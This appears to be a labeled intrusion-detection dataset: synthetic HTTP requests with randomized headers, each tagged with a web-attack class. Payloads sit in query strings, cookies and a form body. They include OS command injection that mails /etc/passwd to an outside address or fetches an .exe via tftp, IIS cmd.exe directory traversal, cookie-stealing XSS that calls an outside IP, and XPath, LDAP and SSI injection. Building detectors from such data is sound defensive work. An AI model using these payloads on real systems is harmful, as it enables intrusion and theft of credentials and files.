If-Range: Sun, 18 Apr 10 21:15:23 GMT
Max-Forwards: 78
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM b3lobHJ0bnRjY2FpRHN1YTkzeHMyb2NvdHJ0eXFlaXRFb2Fnbmhh
Range: -773710,2145-890
Referer: /poNS/nJEii/ioj5gs/shTtg/aldtn.doc
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/7.2 (X11; U; Solaris 4.0; ho-hu; rv:6.2.1) Gecko/44576941
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 605x5902
Via: 4.5 www.ra7ade.gif:96022, Rzlm/8.3 183.113.72.221
Transfer-Encoding: srSoe; iOhim=atq4
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 970 233.253.83.48 "nctm" "Thu, 06 Nov 08 08:21:23 GMT"
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 0450626600564347
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47363
Start - Id: 35647
class: XPathInjection
GET /a.e91tODcGrluShhyeLl/mddssarAtodre/glznmmtnoen/ijFAVE9ygroup byBV5EQ/NTHoMcZAHaGq/ueieitshprrriiis/onp0_2Y.6NcF.Di1HxlN/4hthGqvsocegeek8mf/bHteaya/aed3.jpeg?besecnar4hpS=+f%40q&nI4h9ihchEet=ed4I8U&ecrhAmiobdCtfdA=natNd4%3Bg1%25tseincludewgetcmd%29&jFimgFB=ea&zoinehe=rtnchecnoo2osi&mrihhuwinn=39070377&ste0u=1++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++6584%3D&aoEam=metaitahtpassiframepd%24unionhh%28n%3Drfh&OspugweeseotIfh=830670883&le=91 HTTP/1.1
Host: www.esecjsih.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-2, x-mac-icelandic, windows-1251;q=0.9, cp-932;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=04
Client-ip: 27.218.117.196
Cookie: ustiOl5ae1re6=48253479;lisxl1= eoee;citlkrotetlo=1861;evtgn=zmdocumentewinnt:lnseoe<qd;yOH63X=fnhenie5wnr7wflygs;geNS8a12enernd=mWD6DZNDg-7
Cookie2: $Version="053"
Date: Wed, 22 Aug 07 06:46:41 UTC
ETag: "M3ZVH_ldXyZcfC-"
Expect: linOta
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Thu, 06 Oct 05 14:17:44 CET
If-Unmodified-Since: Mon, 24 Jul 06 16:14:41 UTC
If-Match: *
If-None-Match: "YN5sgtc1eWejhtR"
If-Range: *
Max-Forwards: 4748
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="snOLwi"
Authorization: NTLM bHRscTVzaWF1eGVBcmZ3Y2xUYm5uY2Zzbndvc3NvaWZ1dHRvUmh5ZG15
Range: -38,162-85,-031
Referer: http://iehw.st/dvtm/Moidple/oppwe4/htBiodyn.pl
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: ter1dnas (sNoJujYq_V; 5JhL-e; dX7_gCy5p; dA50rpu4; nLKbgOOW-4)
UA-CPU: StrongARM
UA-Disp: 458,730,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3327x2128
Via: 2.6 100.197.18.16, 0.4 201.148.135.80
Transfer-Encoding: identity
Upgrade: zizt/1.0, Nfsr/7.3, araJv/5.9, 0athyr/9.5, 7a2ey/9.9
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 9747150150274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35647
Start - Id: 43365
class: OsCommanding
GET /rns3etmeNaaee5srr/aBx.nsf?lsipAape1hTr=tta&aqm5i1oinr=aet%7Ee&like7connectAfON6=b%28c%2Bmsw+&ceok4S5Hneee=oops+++++%3B+++++cat+%2Fetc%2Fpasswd+%7C+++++mail++your%40imdtn.com&aeetleeiifr=dts0eLayrinsertnph-i&mpce=aSxd0S&xw_KN8V=i7yl_HzB_j&tEwpt=crrA&orni=7&is=eIt%5DopiG&xeol=edwhhiwos HTTP/1.1
Host: www.flafn.be
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr, windows-1250, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 149.20.39.78
Cookie: enka5yet0d=c6inxoajed<j-a;ATdeneoleti7azE=3s;RneyexHnIs= eh
Cookie2: $Version="744"
Date: Mon, 26 Jan 04 20:51:10 UTC
ETag: W/"MfQ3kG-@pCjXqY2jW"
Expect: 100-continue
From: xrca@p4bIo.st
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Wed, 07 Feb 07 11:22:56 CET
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 084
MIME-Version: 3.7
Pragma: q=hoq
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 9-
Referer: http://agtLAks.org/sSfussu.exe
TE: trailers
Trailer: Authorization
User-Agent: 5mdt (y.-l4IhH; bSeehsdV; jRz1zj)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43365
Start - Id: 40806
class: SSI
GET /omdehRswr/wz@k@zR1Ab54Y9-Uj/mt4erojtr5.dll?rbTF=%3C%21--%23odbc+++connect%3D%224nSinv%2CLqii%2Czsa%22+++++++statement%3D%22select++++*+from+reiR%22--%3E HTTP/1.1
Host: 236.225.42.173
Connection: close
Accept: */*;q=0.5
Accept-Charset: iso-8859-6, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=223
Client-ip: 255.59.165.34
Cookie: Touurhayfb=n@mVjBvGxBft;shb=:daeruojeunion](osam5
Cookie2: $Version="313"
Date: Sat, 27 Aug 05 03:19:30 GMT
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 04 Jun 09 06:55:00 UTC
If-Unmodified-Since: Fri, 27 Jan 06 24:12:08 UTC
If-Match: "SnWfAvpwjBHRiWG"
If-None-Match: *
If-Range: *
Max-Forwards: 7014
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="9des"
Authorization: tdrm rbhoee=aaoth
Range: 89010-,593978-8589,-17027
Referer: http://www.hcnsj.be/waean/zeMob6.avi
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 5.3; d0-ir; rv:7.3.2) Gecko/28647820
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: 3.1 163.229.123.125:39629, 9.3 188.171.226.164, FTP/0.3 www.ds4e9ag.shtml
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: adlr/3.8, ehsO/1.6, anah/5.9, zlni/3.4
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40806
Start - Id: 48859
class: XPathInjection
GET /aOrXb5Y/stylePjmdWw9oXSwbdK/eoNt/et0M_/dPUgXrC/oh4c/CtHUetctVM0aRv-JX/r5wyb.php?Uafud=s8lfdse6tqyIhu&eQte0dhtne=lirnjR%5Diiio&are6ti5nlzsohLr=595+++++or++++1%3C+te%2F6fruu%2Fea%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D507%5D++or++++24098%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&LwOlxmlMP=otg6YVTclAe&Kx.glibA1binunion=8&wOXrl9=chtaccesc5fsdciinsert&nu8aba1carrnles=eima&BRYk8C2_BjG=iiidsbwmdhoiefn&Rnah4OI=2 HTTP/1.0
Host: www.eeweuoenf.cz
Connection: mpdb
Accept: text/*;q=0.2, image/*;q=0.3, image/*;q=0.2
Accept-Charset: iso-8859-15, x-mac-greek, x-mac-chinesetrad;q=0.9, windows-1255
Accept-Encoding: compress, identity;q=0.3, identity, compress, deflate;q=0.5
Accept-Language: *;q=0.7
Cache-Control: max-age=9
Client-ip: 2.99.117.98
Cookie: 0mRsevgdttraAg=yBgC5vz;OucaEn9xMtshutdownn=47;Zi5xHF=2;he2=1;betdCH=nrsSVF1.
Cookie2: $Version="658"
Date: Thu, 14 May 09 20:41:25 CET
ETag: "_fRV_D@7oKn-qsK"
Expect: akafu79
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Fri, 15 Oct 04 02:09:24 GMT
If-Unmodified-Since: Thu, 11 Nov 04 21:22:43 CET
If-Match: *
If-None-Match: "yGPXJDIkby_lr@n"
If-Range: Tue, 28 Oct 08 15:50:10 CET
Max-Forwards: 3399
MIME-Version: 4.5
Pragma: s9l=yl7ph
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: ny0gr nuiEapsn=otrx
Range: 572-841,573-
Referer: http://www.hilB7e.com/oiblc/ienyd/etdmti.wav
TE: trailers
Trailer: Accept-Charset
User-Agent: otVrlcexyinfshun
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1420x8323
Via: 5.6 www.f5iV4.tiff, 9n6/8.5 70.204.245.100
Transfer-Encoding: compress
Upgrade: wrmk/0.8, tyuf/8.4, rih/4.1
Warning: 031 102.38.172.102 "nisa2e2yv" 
X-Forwarded-For: 186.251.4.115
X-Serial-Number: 6876836791453
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48859
Start - Id: 37192
class: LdapInjection
GET /idaadoyaceefnoxod/c5erZZbUekG-AFcZ/y85vRa6c7Ss0/CFQ4ftpr3F_Npassthru/a8b5PWLbf2bI/63Zb/m3/cIXN-weqWjy/tsuOTYzN8TmHJQrLneE/jqkz2adL.Fq.pl?ttMbdoh=nXph&eiwi3=tb3OYPA&7y3H0etc6=eeescritoc3ioeD&3netqneeodes=5Z0yztyTcjA&aem=1-Z0&wf_K=chogodttBslaA&eYhT9IctWEAMotc=FTrwPs&bt7sonnhu5w=2140&lubdlOel=+kateeueu0txst&I93KvbscriptlutvYshutdown2=0004689120&ehoewOxoIt=echor7%5Drretz%3Etptm&style@roCK9ndivf=h%2B+cediy%5Cdmz&MstcrAtstLeaa=%29++%28+%7C%28++++cn%3D*o+%27brien*%29%28mail++++%3D*o+%27brien*+++%29&3sYI=gryrh HTTP/1.1
Host: 253.252.139.82
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.2, iso-8859-8-i, euc-tw;q=0.4, windows-1253;q=0.8, utf-7;q=0.3
Accept-Encoding: compress;q=0.3, compress;q=0.0, identity, deflate;q=0.0
Accept-Language: 32hSs-lpg, 5-t1, nh3oxu3-ruakn;q=0.2, 1WrdrtV-cs9deeor;q=0.0
Cache-Control: arD=mieollIt
Client-ip: 129.219.81.71
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="524"
Date: Sat, 17 Feb 07 20:23:55 GMT
ETag: "gWkihjapRYwi3oCzZ"
Expect: 100-continue
From: ssnh@aamhzelr.net
If-Modified-Since: Sun, 29 Nov 09 20:31:08 GMT
If-Unmodified-Since: Sun, 01 Jul 07 05:46:50 CET
If-Match: "2bdAEexNEHPvlxW"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 91
MIME-Version: 2.5
Pragma: no-cache
Authorization: NTLM b2FqQW9yb3dyYXQxZ3VhZWVqNWFpZWFhb280bFRkdDYxN3M=
Range: 605-286224
Referer: /fonr/sb8n.jpg
TE: trailers,chunked,chunked
Trailer: From
User-Agent: nhhny (tPXJQd; hWLPWJ; i1BZv-Dh1p; rcoeCG7yO)
UA-OS: Win98
Via: 2Irhs/1.2 92.36.242.48:85
Transfer-Encoding: 4ndit; rnatwo=rfRh5se
Upgrade: resPct/8.2
Warning: 049 www.snrd.js "elEedMobfonU" 
X-Forwarded-For: 200.50.212.253
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37192
Start - Id: 46061
class: PathTransversal
GET /4P7u8x2Fla-a@O.gif?oYvUgpelti2mis=position&ioedarfavw=5%40t%2B&gn=k%27h%40rqb1frosNo&em=tpVp1%40MyFiZr&rtkAzgeyay9eht=1i8offto HTTP/1.1
Host: 152.183.91.64:99
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-4;q=0.7
Accept-Encoding: gzip;q=0.3, identity, gzip, deflate, deflate
Accept-Language: o7q-bnt329;q=0.0, a-dTetpoe, ta6ni-tEsdTewd, rqH6yow-e89cf;q=0.0
Cache-Control: n=7t7z
Client-ip: 161.201.44.66
Cookie: mailTps2PmTG=\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html;pa8=4;6fiteneeioi=>aeastylegroup by;1efza1cb3GSo=cblp;hVRNq=tPfgK9dBB7Q;Dia=8657454
Cookie2: $Version="569"
Date: Wed, 31 Mar 04 01:44:47 GMT
Expect: rsaf2q
From: Uglt@gX3ubtt.gov
If-Modified-Since: Wed, 07 May 08 09:05:08 UTC
If-Unmodified-Since: Thu, 15 Nov 07 20:59:48 GMT
If-Match: *
If-None-Match: "xuK_9S5fGkIp@00mMzYX"
If-Range: *
Max-Forwards: 5
MIME-Version: 2.6
Pragma: no-cache
Authorization: Crdo naani=coy9ts
Range: 245987-,327-287216
Referer: /c3emu/twm4ge/3lee/ciistt5.jpg
TE: trailers
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 1.8; 1h-sd; rv:2.4.2) Gecko/15245706
UA-OS: Windows 95
Via: oEisoa/7.6 133.67.124.141:15244, FTP/4.0 www.94knj.js
Transfer-Encoding: nmhd; ernggzoE=sievas
Upgrade: e8tdi/9.1
Warning: 150 www.zkc9.js:3 "ceisnt" "Sat, 08 May 04 14:12:08 CET"
X-Forwarded-For: 232.217.218.144

null

End - Id: 46061
Start - Id: 47402
class: XSS
GET /siAattxsodSmqDr5hgio/ee7/spY.PT/ei2SjeanRijntxNn/LVQDz5Y/9KAkTQK2x.tiff?Ehorsn=iglhatmpta2e%7C&td=5104876450&enca95Rlti0tq=32056&@BuKtPgrFGV=V6a&fhaisalldw6r=%3Cdiv+++style++++%3D%22binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.rotrettr.com%2Fscript%2FFeiadnn6.php%5D%29%3B+%22+++%3E&hnarrtwme0esjnn=md+1ninsertouieon+d%3Ecom HTTP/1.0
Host: www.eisdarerh.st:7802
Connection: keep-alive
Accept: application/zip;q=0.6
Accept-Charset: x-mac-cyrillic;q=0.5
Accept-Encoding: gzip, deflate, identity;q=0.4, compress;q=0.7
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Tue, 25 May 04 14:52:58 UTC
ETag: "xslHmXI@16wFajcv"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: *
If-None-Match: "Jcoz8eEx4bFjMYp"
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 0
MIME-Version: 0.3
Pragma: inlgbsth=yrl8b
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: Basic ZWVpbzpDSGt6N3R0aw==
Range: 3529-807061,329-36,-0646
Referer: /umpiopa/moutzl/oratet/Oibee7s0.cfm
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.3 (compatible; Konqueror/5.2; Open BSD i586; ntvataahne; sslso)
UA-CPU: StrongARM
UA-Disp: 815,562,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/4.9 83.108.112.70, TiEa/1.4 www.s0efd.jpeg:4799, HTTP/5.1 44.102.156.190
Transfer-Encoding: idune
Upgrade: sEtli/1.4, eqt/6.4, eixu/1.5
Warning: 420 47.114.190.11 "tisyat2nhQero" 
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47402
Start - Id: 40826
class: SSI
GET /Isuim/utnlrp8ebeEEs/0Shtacces2vOZO4GQVS/aqQIGUFSYlB3Jz-L/t@A-H@@m7FaM1W/itekdftlek0vtca.mspx?ceoegphrlntIxso=93854428&2dern=2&ne=%25ua%2B&a1ee3rrio2l=qbnSQ&9ElOfZYE=18713&ftbdo5=59024010&rc7eicmeetnEunA=eweg&T3tcnrMe=696288&itR3no=0dC-HgizTD9A&h5nxLAdbvusiz=397134837&eamh7rhA=46895951&WLU-caIoQH39=%3C%21--%23odbc++statement+++%3D%22select++encgat%2C+++++rmisrn%2C+dte+++++from+en6sEas+++order++++by+6%2C+++++18%2C+7%22++++--%3E HTTP/1.1
Host: 77.246.104.150
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1253;q=0.2, windows-1253;q=0.2, euc-cn
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: ah='tt'
Client-ip: 244.239.23.2
Cookie: CzjIztmp9WF02=gmmtlcs;aseyteotifs=ss;or;Ibspsulxsddso=550713;bkyTj=vTsH6EtSS.x;hhHselcS=77260;rsuzErizyo=hlibn\cnri
Cookie2: $Version="76"
Date: Sun, 12 Dec 04 12:38:11 GMT
ETag: W/"kwmIzY..D6fs-WSA0"
Expect: R4w4=f6aeth
From: heeo2q@daRia.de
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "RhS9OT_ewEpWHXoG-"
If-None-Match: *
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 67
MIME-Version: 9.6
Pragma: ywewiei='oeNhn'
Proxy-Authorization: es08e taeiRD8d=u4req1e
Authorization: NTLM MmlldGlveWVtZWJuYWRtbnR4dEV3aXNob250b3U4T3NzTGNpc3JlZTU=
Range: 90-,846222-
Referer: /w1ee/strEegm2.tiff
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (compatible; s3w5ag4t; Unix; cceOa)
UA-CPU: PowerPC
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 477x827
Via: 1.6 www.a4ip.shtml, HTTP/2.0 103.117.110.226
Transfer-Encoding: deflate
Upgrade: dns/1.4, Irtee/1.9
Warning: 601 42.121.7.112:3 "rlcreLunhecrNsee" 
X-Forwarded-For: 117.113.0.208
X-Serial-Number: 623411
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40826
Start - Id: 36506
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.is3ck.de
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 128.26.229.78
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="1"
Date: Sat, 17 Jan 04 24:01:02 CET
ETag: W/"HO@wSNWTFD53YH2nU"
Expect: atcEeo
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Mon, 15 Mar 10 05:55:03 UTC
If-Match: *
If-None-Match: "f0hZINOGhvietrIWvi"
If-Range: *
Max-Forwards: 9509
MIME-Version: 8.3
Pragma: agsx='llu'
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: Basic dHJ1STpsU2JicmV4
Range: 560-980083,973913-
Referer: http://www.ahe5.st/7gsrrop/eL7sbs/fGten/Ehhv.mp3
TE: gzip;q=0.3
Trailer: From
User-Agent: Mozilla/3.0 (X11; U; Linux i586 6.5; fo-en; rv:3.9.1) Gecko/03950832
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/6.6 www.mi6n6.jpg, HTTP/4.1 129.14.130.80
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36506
Start - Id: 44479
class: OsCommanding
GET /scripts/..%5c%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 152.175.136.182
Connection: keep-alive
Accept: video/mpeg;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 237.182.55.206
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="084"
Date: Fri, 29 Jan 10 09:42:42 GMT
ETag: "gKK7@uu-dxePQktSWetg"
Expect: nets=rpaui;afeisve8=e88t
From: xeaiisnn@jemn.de
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Tue, 07 Oct 08 21:39:33 GMT
If-Match: "-2f-zGAdk8@WgGA-fWr_"
If-None-Match: "RY.bCAbK6L.4XEW"
If-Range: *
Max-Forwards: 58
MIME-Version: 3.4
Pragma: e='etee'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic ZUVTZW5uOjlqZW1zYw==
Range: 31467-04,46-
Referer: /h6yo/ncsree/zdrAoh.htm
TE: gzip,trailers
Trailer: Trailer
User-Agent: edsri (faYJ8B4_qs)
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4559x569
Via: lni/4.6 www.m4upn.gif, 5.8 www.iOREoH.jpg
Transfer-Encoding: deflate
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44479
Start - Id: 46845
class: XSS
PUT /i8HvHTKZU794m/reotrt65htnenyjehc/ebICiaectLdu0thol/uTywt/rohseRs5tp12/41dgnLoet3amoebaepd/lptd/10nlApeeHadescTtaot3/N7GFUs/euatyJ236sFhh1bCJdWa/uewuvtoE8e75oAitru/io0PyH27AsgDS3-KqKSJ.msf? HTTP/1.0
Content-Length: 216
Content-Language: r,resdr,0
Content-Encoding: deflate
Content-Location: http://www.zfr3is.gov/asreei/iidter/sdfarrSd/Meer.php
Content-MD5: dWVwcGV5Mno3dGZic2tUZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Dec 09 08:03:06 GMT
Last-Modified: Tue, 20 Nov 07 11:46:02 UTC
Host: 108.255.158.114
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-hebrew;q=0.3, windows-1257;q=0.1, euc-tw, cp-932
Accept-Encoding: gzip, compress;q=0.6, identity, identity
Accept-Language: bmaihE-xnsgbev, is4t-arne;q=0.1, tee-goyhllel, cysrp-Ly;q=0.5, seairneh-gn;q=0.2
Cache-Control: min-fresh=84308
Client-ip: 175.15.203.198
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Fri, 25 Jun 04 22:18:42 UTC
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Thu, 04 Jan 07 10:27:19 CET
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: "mMUMY6aLY@fQkiD4x"
If-None-Match: *
If-Range: *
Max-Forwards: 89
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: http://stltsa.it/lpls0a/rceint/st1f/ea1d7.cgi
TE: trailers,trailers
Trailer: Referer
User-Agent: me9nNdthrk (eM@AMvrWh; hID5@Fs; r@QkayGa; ccWKseY7qo)
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: FTP/0.8 171.91.229.27:70198, 8.1 199.243.97.31, HTTP/7.0 237.140.236.126
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VZC-inwgetZK=i&e7spniis=<img     dynsrc  = "    javascript:   [window.open('http://118.60.199.81/dellis.dll'+document.cookie);] ">&W0iplib9JXxX=9823&OnullformKpasswdHY_nZ=368207806

End - Id: 46845
Start - Id: 36768
class: OsCommanding
GET /nitnuk/r3OC.js?otarhdds=182&1saecthMt=529442&3oisdz=22&8imnthvmad=AE&ew1fwnheeuj=w%3Bt&_0Iw=8&hiTf4=ebhso&nivaRTs=aUA9r&sitapfentnnr9sd=e6nysihyysEigs&sezsvetT2heejr=nGeFCfrg&nMRerr6hrhs0sem=lemt&oeaTygrnoyevei=39&orDpdy=tftp++++-c++get+16.122.58.138%3A%2Fil%2Fntletoti.exe+++%7C&rkkuar=5655676 HTTP/1.0
Host: 246.68.151.174
Connection: close
Accept: application/rtf;q=0.9
Accept-Charset: euc-cn, isiri-3342;q=0.7, cp-936;q=0.1, ks_c_5601-1987;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: fepphe2=4Epasu
Client-ip: 175.79.197.116
Cookie: tZi8onu=4;egoseet5adhreas=352;rit2cur=45;5At3n=66026995
Cookie2: $Version="22"
Date: Fri, 03 Dec 04 22:25:40 GMT
ETag: "bG0iOuAbRP_eNEv"
Expect: 100-continue
From: excu@itaiLs8n.it
If-Modified-Since: Fri, 09 Apr 04 23:57:10 GMT
If-Unmodified-Since: Fri, 30 Nov 07 05:34:13 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 10 Sep 07 06:12:25 CET
Max-Forwards: 4
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: cavyd p9Spn=rbeshotc
Authorization: Basic b25lTG5uOmFnYXNOY2g=
Range: 8-,6-50
Referer: http://n52sf.st/eA4c.swf
TE: trailers,trailers
Trailer: If-Range
User-Agent: h9jeaeEetngiwvoihenr
UA-CPU: 68000
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 232x1783
Via: HTTP/7.1 91.205.193.172, HTTP/0.0 www.binr.shtml:72201
Transfer-Encoding: gzip
Upgrade: veestt/0.4, vitr/3.3, tohkos/9.8, ypboEe/8.4, Resser/0.1
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 145.74.246.159
X-Serial-Number: 51873709956197
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36768
Start - Id: 37263
class: LdapInjection
GET /ihu0Eogi/tRo7qmYOUi-/rWcXT6CUdrWlBGj/ir4tH7GcwTFYRhw/k3PScL9JdX8uL/homeorv4P2/2oex4b0adwvds7grN/4slee/noh/H065WfWidIHWxZ/rs0gUs8pYOawvDfKsE0e.cfm?hnd4atio=9&hqiuteQ7uea5w=a+%40s&nullRe0Cyyq0C=yGob_An&oupas6licut7t=%29+++%28++%7C++++%28displayName%3Dhad*%29+++%28name+%3D+had*++++%29%28+mail%3Dhad*+%29&bu0wwp-catWf=6060&JkinputuM-echohLu=8250&969unhjc0z=i5Zj%40d&CrIjJ6yr2znetcat3=2Yvqd&leoMhtsthrt=rb%3Easls+rcpobjectt%3Feoxmlms%24shi&8vPeDah5t7=noasWeee9ulaH HTTP/1.0
Host: www.h2ajebhep5.biz:80
Connection: hToj1
Accept: video/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.3, compress;q=0.4, deflate;q=0.1, gzip, gzip;q=0.8
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 149.88.29.234
Cookie: n6tn_meta=iaaim2soairhhw;nt=uwei
Cookie2: $Version="54"
Date: Sun, 01 Jan 06 17:05:29 CET
